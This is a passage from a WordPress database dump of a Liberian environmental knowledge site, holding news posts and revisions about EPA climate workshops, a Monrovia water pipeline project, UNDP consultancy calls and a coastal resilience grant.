his presentation, Mr.&nbsp;Benjamin S. Karmorh, Jr., National Focal Point for the UNFCCC, pointed out that&nbsp;climate change is a global crisis and Liberia is no exception to it, with analysis and research showing that the country is vulnerable to the adverse impacts of this phenomena.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that the impacts of climate change in Liberia is seen all over the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Although Liberia has relatively high elevation with highland and rolling hills covered rain forest, he said climate change is a global threat with Liberia being no exception as erosion continues to eat up the coastline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Karmorh explained: “It’s in this view that Liberia is a signatory to a number of conventions and protocols in making sure that climate change related issues are addressed at both local and international levels.”&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Moreover, Mr. Karmorh informed the gathering that the impact of global climate change will increase and if nothing is done may lead to devastation as this is already being felt in Liberia and&nbsp;human activities adding to this effect is not helping either.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He recommended that the environmental resources and potential of Liberia is enormous and if properly managed will benefit the current generation and future generations to come.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is vulnerable to climate change due to high rate of poverty, poor infrastructures, inadequate and lack of trained human resources, etc. It is a serious and on-going threat to our Agenda for Transformation. It is also a threat to national sustainable development, peace, security and stability,” Mr. Karmorh said during his presentation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part,&nbsp;Dr. Charles Asumana, Sr.,&nbsp;National Project Coordinator of the BUR–1 Project &amp; UNFCCCTechnical Expert Reviewer, said&nbsp;the objective of the project is to prepare and submit Liberia’s First BUR–1 to fulfill national obligations to the UNFCCC (Article 12).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Ansumana disclosed that the project proposal has been prepared as per requirements of the UNFCCC for BURs and based on Decision 17/CP. 8 - Guidelines for the preparation of Biennial Update Report from Parties not included in Annex I to the Convention.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the project falls under the support of the Global Environmental Facility (GEF) for convention-related reporting and assessment, and is implemented on an agreed full cost basis requiring only in-kind contribution by GEF-eligible countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;He went on to say that the project is in conformity with objective 3 of the GEF-6 Climate Mitigation Strategy that focuses on fostering enabling conditions to mainstream mitigation concerns into sustainable development strategies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s strategic location in the West Coast of Africa within the Mano River basin makes it ideal for her rich natural resources in the region, likewise some major environmental issues associated with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inter-linkages between environment, development, security and good governance in Liberia are clear and the threat of climate change is ever present.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Over the last few decades, poor environmental management, overexploitation of natural resources and poverty have been some of the issues that the country has been faced with but due to the brilliant leadership of many stakeholders involved mainly the EPA and the intervention of international partners, Liberia seems to be well on course.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA is with the conviction that the impact of global climate will increase and if nothing is done may lead to devastation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia has vast coastline which stretches about 580 kilometers and host huge population density of the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The placement of major sea ports along the coastline and the ever presence of beautiful beaches give a greater advantage to the Liberian economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The biodiversity supports lives and livelihoods, by providing essential services. It is a major source of harvestable goods including food, medicines and building materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Biodiversity is also essential for the regulation of natural processes, and the earth’s life support systems such as carbon sequestration, soil formation and water purification.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Climate change is a global crisis and Liberia is no exception to it, analysis and research show that Liberia is vulnerable to the adverse impacts of this phenomena. The impacts of climate change in Liberia is seen all over the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It’s in this view that Liberia is signatory to a number of conventions and protocols in making sure that climate change related issues are addressed at both local and international levels.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->','EPA Ends Validation Workshop on 1st Biennial Update Report Project','','inherit','closed','closed','','3038-revision-v1','','','2020-03-05 17:14:52','2020-03-05 17:14:52','',3038,'https://ekmsliberia.info/3038-revision-v1/',0,'revision','',0),(3041,38,'2020-03-10 14:54:23','2020-03-10 14:54:23','<h3><strong>COMING SOON!!!!!!</strong></h3>','Youth Development Services (YDS)','','publish','closed','closed','','youth-development-services-yds','','','2022-09-14 14:35:00','2022-09-14 14:35:00','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=3041',12,'institution','',0),(3043,38,'2020-03-10 14:54:23','2020-03-10 14:54:23','<h3><strong>COMING SOON!!!!!!</strong></h3>\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Youth Development Services (YDS)','','inherit','closed','closed','','3041-revision-v1','','','2020-03-10 14:54:23','2020-03-10 14:54:23','',3041,'https://ekmsliberia.info/3041-revision-v1/',0,'revision','',0),(3045,38,'2020-03-19 10:39:03','2020-03-19 10:39:03','<!-- wp:paragraph -->\n<p>Cross-section of Participants at the Stakeholder\'s review for the 1,200mm pipeline water project from Mt. Coffee Dam to the White Plains Water Treatment Plant</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><em>As\nresidents representing several affected towns registered ‘no objection’ to the\nproject</em></strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Millennium Challenge Account (MCA)\nLiberia will today, November 1, 2019 break ground for the construction of a\nUS$18 million raw water pipeline between Mount Coffee Hydro-power Plant and the\nWhite Plains Water Treatment Plant, following stakeholders’ review organized by\nauthorities at the Environmental Protection Agency (EPA), an EPA release says.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>MCA-Liberia is a Liberian-government\nagency created in 2015. It is responsible to implement a US$257 million grant\nprovided by the American Government through the Millennium Challenge\nCorporation (MCC).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the release, residents representing several towns in the\nHarrisburg township ‘registered no objection’ to the construction of the 1200\nmillimeters (diameter) Raw Water Transmission Pipeline from Mount Coffee\nHydro-power Plant to the White Plains Water Treatment Plant, during the\nstakeholders meeting.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kawusu Toure, EPA assistant manager for environmental social impact assessment\n(ESIA), said the gathering, which brought together residents, representatives\nof line ministries and agencies, was intended to review an ESIA for the\nconstruction of the pipeline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The ESIA, according to Mr. Toure, was prepared by Liberia Engineering and\nGeo-Tech Consultants (LEG Consultants), an independent environmental evaluator\nfor DENYS NV, a foreign-based firm contracted to construct the pipeline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Toure told the citizens and those who attended the interactive forum that\nthe ESIA report was presented to the EPA in pursuit of an Environmental Permit\nfor the construction of the pipeline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a Powerpoint presentation, Mr. Toure explained that section 20;\nsubsection (2 and 3) of the Environment Protection and Management Law of\nLiberia, mandates the EPA to constitute an Environmental Impact Assessment\nCommittee to review Environmental Impact Statements and Management Plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>John Jallah, EPA manager for compliance and enforcement, said the EPA cannot\nissue Environmental Permit in the absence of an ESIA report.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the stakeholders’ engagement is intended to hear from residents of\nthe affected communities, as well as resolve issues surrounding social impact\nrelative to the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>LEG Technical Director, Nelson S. Jallah, who provided the project overview,\nsaid that the U.S., acting through the MCC, entered the Millennium Challenge\nCompact with the Liberian government to facilitate poverty reduction through\neconomic growth in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Jallah said the project, which is part of the compact between the two\ncountries, is intended to replace the 900 millimeters diameter raw water\npipeline leading from the Mount Coffee Dam to White Plains with a 1,200mm\ndiameter raw water transmission pipeline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said that the replacement of the 900 mm diameter raw water pipeline to a\n1,200 mm diameter raw water transmission pipeline, will improve reliability and\nbetter quality of the water provided.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Paul Kennedy, MCA-Liberia director for Environmental and Social Performance,\nlauded the EPA for the dialogue; and said that the construction of Raw Water\nTransmission Pipeline from Mount Coffee Hydro-power Plant to the White Plains\nWater Treatment Plant is intended to pump safe drinking water to the 1.2\nmillion people in Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kennedy said the construction of the pipeline is an environmental mitigation\nproject following the rehabilitation of the hydro dam’s impact on the water\nsource to Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said salt water was entering the water source to Monrovia, and therefore,\nthe new pipeline would be constructed above 20 meters above sea level into the\nhydro dam to prevent the salt water from entering the water supply system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kennedy said that the project was not part of original projects\nearmarked under the grant, “but it came about due to the sea water intrusion in\nthe system.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Portion of the US$257 million grant,” he said, was used for the\nrehabilitation of the dam, and the maintenance of roads across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Though the project is small and would last for six months, DENYS NV’s\nFrederic Fouillot said it will provide jobs for 100 residents of Harrisburg\nTownship.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He then assured the public that the 100 contractors would be selected from\nacross every community in the township, and that some farmers and properties\nowners would also be compensated for damaged crops, and structures that would\nfall in the routes the pipeline has earmarked for the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>An international environmental specialist, Britta Lammers, hired to oversee\nthe compensation process, is currently working to ensure that every person\naffected by the project gets their “just compensation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some residents, in separate remarks, lauded the EPA for the engagement, and\npromised to cooperate with the project management team.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','MCA Liberia Breaks Ground for US$18M Pipeline Water Project Today','','publish','open','open','','mca-liberia-breaks-ground-for-us18m-pipeline-water-project-today','','','2020-03-19 10:39:06','2020-03-19 10:39:06','',0,'https://ekmsliberia.info/?p=3045',199,'post','',0),(3046,38,'2020-03-19 10:37:17','2020-03-19 10:37:17','Cross-section of Participants at the Stakeholder\'s review for the 1,200mm pipeline water project from Mt. Coffee Dam to the White Plains Water Treatment Plant','Cross-section-of-Participants-at-the-Stakeholders-review','','inherit','open','closed','','cross-section-of-participants-at-the-stakeholders-review','','','2020-03-19 10:37:53','2020-03-19 10:37:53','',3045,'https://ekmsliberia.info/wp-content/uploads/2020/03/Cross-section-of-Participants-at-the-Stakeholders-review.jpg',0,'attachment','image/jpeg',0),(3047,38,'2020-03-19 10:39:03','2020-03-19 10:39:03','<!-- wp:paragraph -->\n<p>Cross-section of Participants at the Stakeholder\'s review for the 1,200mm pipeline water project from Mt. Coffee Dam to the White Plains Water Treatment Plant</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><em>As\nresidents representing several affected towns registered ‘no objection’ to the\nproject</em></strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Millennium Challenge Account (MCA)\nLiberia will today, November 1, 2019 break ground for the construction of a\nUS$18 million raw water pipeline between Mount Coffee Hydro-power Plant and the\nWhite Plains Water Treatment Plant, following stakeholders’ review organized by\nauthorities at the Environmental Protection Agency (EPA), an EPA release says.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>MCA-Liberia is a Liberian-government\nagency created in 2015. It is responsible to implement a US$257 million grant\nprovided by the American Government through the Millennium Challenge\nCorporation (MCC).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to the release, residents representing several towns in the\nHarrisburg township ‘registered no objection’ to the construction of the 1200\nmillimeters (diameter) Raw Water Transmission Pipeline from Mount Coffee\nHydro-power Plant to the White Plains Water Treatment Plant, during the\nstakeholders meeting.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kawusu Toure, EPA assistant manager for environmental social impact assessment\n(ESIA), said the gathering, which brought together residents, representatives\nof line ministries and agencies, was intended to review an ESIA for the\nconstruction of the pipeline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The ESIA, according to Mr. Toure, was prepared by Liberia Engineering and\nGeo-Tech Consultants (LEG Consultants), an independent environmental evaluator\nfor DENYS NV, a foreign-based firm contracted to construct the pipeline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Toure told the citizens and those who attended the interactive forum that\nthe ESIA report was presented to the EPA in pursuit of an Environmental Permit\nfor the construction of the pipeline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a Powerpoint presentation, Mr. Toure explained that section 20;\nsubsection (2 and 3) of the Environment Protection and Management Law of\nLiberia, mandates the EPA to constitute an Environmental Impact Assessment\nCommittee to review Environmental Impact Statements and Management Plans.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>John Jallah, EPA manager for compliance and enforcement, said the EPA cannot\nissue Environmental Permit in the absence of an ESIA report.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the stakeholders’ engagement is intended to hear from residents of\nthe affected communities, as well as resolve issues surrounding social impact\nrelative to the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>LEG Technical Director, Nelson S. Jallah, who provided the project overview,\nsaid that the U.S., acting through the MCC, entered the Millennium Challenge\nCompact with the Liberian government to facilitate poverty reduction through\neconomic growth in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Jallah said the project, which is part of the compact between the two\ncountries, is intended to replace the 900 millimeters diameter raw water\npipeline leading from the Mount Coffee Dam to White Plains with a 1,200mm\ndiameter raw water transmission pipeline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said that the replacement of the 900 mm diameter raw water pipeline to a\n1,200 mm diameter raw water transmission pipeline, will improve reliability and\nbetter quality of the water provided.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Paul Kennedy, MCA-Liberia director for Environmental and Social Performance,\nlauded the EPA for the dialogue; and said that the construction of Raw Water\nTransmission Pipeline from Mount Coffee Hydro-power Plant to the White Plains\nWater Treatment Plant is intended to pump safe drinking water to the 1.2\nmillion people in Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kennedy said the construction of the pipeline is an environmental mitigation\nproject following the rehabilitation of the hydro dam’s impact on the water\nsource to Monrovia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said salt water was entering the water source to Monrovia, and therefore,\nthe new pipeline would be constructed above 20 meters above sea level into the\nhydro dam to prevent the salt water from entering the water supply system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kennedy said that the project was not part of original projects\nearmarked under the grant, “but it came about due to the sea water intrusion in\nthe system.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Portion of the US$257 million grant,” he said, was used for the\nrehabilitation of the dam, and the maintenance of roads across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Though the project is small and would last for six months, DENYS NV’s\nFrederic Fouillot said it will provide jobs for 100 residents of Harrisburg\nTownship.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He then assured the public that the 100 contractors would be selected from\nacross every community in the township, and that some farmers and properties\nowners would also be compensated for damaged crops, and structures that would\nfall in the routes the pipeline has earmarked for the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>An international environmental specialist, Britta Lammers, hired to oversee\nthe compensation process, is currently working to ensure that every person\naffected by the project gets their “just compensation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some residents, in separate remarks, lauded the EPA for the engagement, and\npromised to cooperate with the project management team.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','MCA Liberia Breaks Ground for US$18M Pipeline Water Project Today','','inherit','closed','closed','','3045-revision-v1','','','2020-03-19 10:39:03','2020-03-19 10:39:03','',3045,'https://ekmsliberia.info/3045-revision-v1/',0,'revision','',0),(3051,38,'2020-05-28 16:38:51','2020-05-28 16:38:51','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will monitor and supervise the integrated environmental knowledge management system reporting the Rio. The project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/EKMS%20Officer.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/EKMS%20Officer.pdf</a>','EKMS Officer/Information Technologist Wanted','','publish','closed','closed','','ekms-officer-information-technologist-wanted','','','2021-08-19 12:42:11','2021-08-19 12:42:11','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3051',129,'ekms_bulletin','',0),(3052,38,'2020-05-28 16:41:17','2020-05-28 16:41:17','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will monitor and supervise the integrated environmental knowledge management system reporting the Rio. The project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities\n\n<a href=\"http://www.epa.gov.lr/sites/default/files/EKMS%20Officer.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/EKMS%20Officer.pdf</a>','EKMS Officer/Information Technologist Wanted','','inherit','closed','closed','','3051-autosave-v1','','','2020-05-28 16:41:17','2020-05-28 16:41:17','',3051,'https://ekmsliberia.info/3051-autosave-v1/',0,'revision','',0),(3053,38,'2020-05-28 16:54:45','2020-05-28 16:54:45','The objective of the proposed Consultancy is to develop an Environmental Awareness Module/Curriculum Mainstreaming the Rio Conventions (Climate Change, Sustainable Land Management, and Biodiversity) into Secondary Liberian Schools to develop concern and awareness among secondary Liberian student.\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/Terms%20of%20Reference%20Educational%20curriculum%202020%20ORG.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Terms%20of%20Reference%20Educational%20curriculum%202020%20ORG.pdf</a>','EXPRESION OF INTEREST Reference: EOI-CCCD/EPA-2020-001 the Development of Environmental Awareness Module/Curriculum Mainstreaming the Rio Conventions into Secondary Liberian Schools','','publish','closed','closed','','expresion-of-interest-reference-eoi-cccd-epa-2020-001-the-development-of-environmental-awareness-module-curriculum-mainstreaming-the-rio-conventions-into-secondary-liberian-schools','','','2021-08-19 12:40:54','2021-08-19 12:40:54','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3053',128,'ekms_bulletin','',0),(3055,38,'2020-05-28 17:12:17','2020-05-28 17:12:17','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will produce and distribute of updated codes pertaining to Rio Conventions. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\nLink:  <a href=\"http://www.epa.gov.lr/sites/default/files/Production%20of%20updated%20codes.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Production%20of%20updated%20codes.pdf</a>','REFRENCE NO: TOR/CCCD/EPA-2020-003 Production and Distribution of Updated Codes Pertaining to Rio Conventions','','publish','closed','closed','','refrence-no-tor-cccd-epa-2020-003-production-and-distribution-of-updated-codes-pertaining-to-rio-conventions','','','2021-08-19 09:14:29','2021-08-19 09:14:29','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3055',127,'ekms_bulletin','',0),(3056,38,'2020-05-29 16:03:25','2020-05-29 16:03:25','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will <strong>Produce articles on the socio-economic linkages on the thematic areas of the Rio Conventions</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf</a>','REFERENCE NO:TOR/ CCCD/EPA-2020-002  EPA, UNDP In Search of Consultant to Produce and Publish Articles','','publish','closed','closed','','reference-notor-cccd-epa-2020-002-epa-undp-in-search-of-consultant-to-produce-and-publish-articles','','','2021-08-19 09:12:00','2021-08-19 09:12:00','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3056',126,'ekms_bulletin','',0),(3057,38,'2020-05-29 16:13:23','2020-05-29 16:13:23','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant, </strong>who will <strong>Produce articles on the socio-economic linkages on the thematic areas of the Rio Conventions</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\n\n&nbsp;','REFERENCE NO:TOR/ CCCD/EPA-2020-002  EPA, UNDP In Search of Consultant to Produce and Publish Articles','','inherit','closed','closed','','3056-autosave-v1','','','2020-05-29 16:13:23','2020-05-29 16:13:23','',3056,'https://ekmsliberia.info/3056-autosave-v1/',0,'revision','',0),(3058,38,'2020-05-29 16:24:09','2020-05-29 16:24:09','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>Local Consultant Firm, </strong>who will produce and air Public service announcement(s)/jingle on globally sensitive and environmentally friendly<strong> behavior</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n<a href=\"http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf</a>','REFRENCE NO. TOR/CCCD/EPA-2020-001 EPA, UNDP Recruiting Consultant to Produce and Air Jingles','','publish','closed','closed','','refrence-no-tor-cccd-epa-2020-001-epa-undp-recruiting-consultant-to-prepare-and-air-rio-conventions-jingles','','','2021-08-19 09:12:31','2021-08-19 09:12:31','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3058',125,'ekms_bulletin','',0),(3060,38,'2020-06-03 14:50:22','2020-06-03 14:50:22','<!-- wp:paragraph -->\n<p>\n\nThe Acting Executive Director of the Environmental Protection Agency of Liberia (EPA), Hon. Randall M. Dobayou on Wednesday June 3, 2020 met with the Solid Waste Management Association of Liberia on the effective gathering, transportation and disposal of solid waste in Liberia.The meeting was intended to mobilize the association to scale up their waste management protocol as effective as possible. The EPA warned that companies that do not meet the requirement to serve as waste provider in Liberia will be fined and possibly shut down.\n\n</p>\n<!-- /wp:paragraph -->','Environment Protection Agency - EPA met with the Solid Waste Management Association of Liberia','','publish','open','open','','environment-protection-agency-epa-met-with-the-solid-waste-management-association-of-liberia','','','2020-08-28 11:28:31','2020-08-28 11:28:31','',0,'https://ekmsliberia.info/?p=3060',198,'post','',0),(3061,38,'2020-06-03 14:48:33','2020-06-03 14:48:33','','epa waste','The Acting Executive Director of the Environmental Protection Agency of Liberia (EPA), Hon. Randall M. Dobayou on Wednesday June 3, 2020 met with the Solid Waste Management Association of Liberia','inherit','open','closed','','epa-waste','','','2020-06-03 14:49:28','2020-06-03 14:49:28','',3060,'https://ekmsliberia.info/wp-content/uploads/2020/06/epa-waste.jpg',0,'attachment','image/jpeg',0),(3062,38,'2020-06-03 14:50:22','2020-06-03 14:50:22','<!-- wp:paragraph -->\n<p>\n\nThe Acting Executive Director of the Environmental Protection Agency of Liberia (EPA), Hon. Randall M. Dobayou on Wednesday June 3, 2020 met with the Solid Waste Management Association of Liberia on the effective gathering, transportation and disposal of solid waste in Liberia.The meeting was intended to mobilize the association to scale up their waste management protocol as effective as possible. The EPA warned that companies that do not meet the requirement to serve as waste provider in Liberia will be fined and possibly shut down.\n\n</p>\n<!-- /wp:paragraph -->','Environment Protection Agency - EPA met with the Solid Waste Management Association of Liberia','','inherit','closed','closed','','3060-revision-v1','','','2020-06-03 14:50:22','2020-06-03 14:50:22','',3060,'https://ekmsliberia.info/3060-revision-v1/',0,'revision','',0),(3063,38,'2020-06-04 13:13:34','2020-06-04 13:13:34','<!-- wp:paragraph -->\n<p><strong>UNDP-supported project benefits 80,000 coastal residents in Sinoe County to build climate resilient livelihoods, and protect communities from sea level rise and other life-threatening climate change impacts</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>3 June 2020 –&nbsp;</strong>The Global Environment Facility (GEF) approved today US$8.9 million in new grant funding from the Least Developed Countries Fund (LDCF) for a&nbsp;<a href=\"https://www.adaptation-undp.org/projects/enhancing-resilience-vulnerable-coastal-communities-sinoe-county-liberia\">coastal resilience project&nbsp;</a>that will benefit 80,000 people in Liberia and rehabilitate 20,000 hectares of degraded coastal habitats.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Implemented by Liberia’s Environmental Protection Agency (EPA) and supported by the United Nations Development Programme (UNDP) the seven-year project will protect vulnerable coastal communities in Sinoe County from rising seas, degraded coastal habitats and other life-threatening climate change-related risks that threaten to undermine progress toward the Sustainable Development Goals (SDGs) and targets outlined in the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The project brings together co-financing and support from a number of sources. USAID will provide US$28 million in co-finance, the World Bank will provide US$15 million, and Conservation International will provide US$500,000 of in-kind contributions through their on-going work in Liberia and West Africa. It also builds on earlier and ongoing projects funded by the GEF and the Green Climate Fund.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Climate change is undermining our goals to build peace and prosperity for our people. Taken together with other actions, this innovative project protects 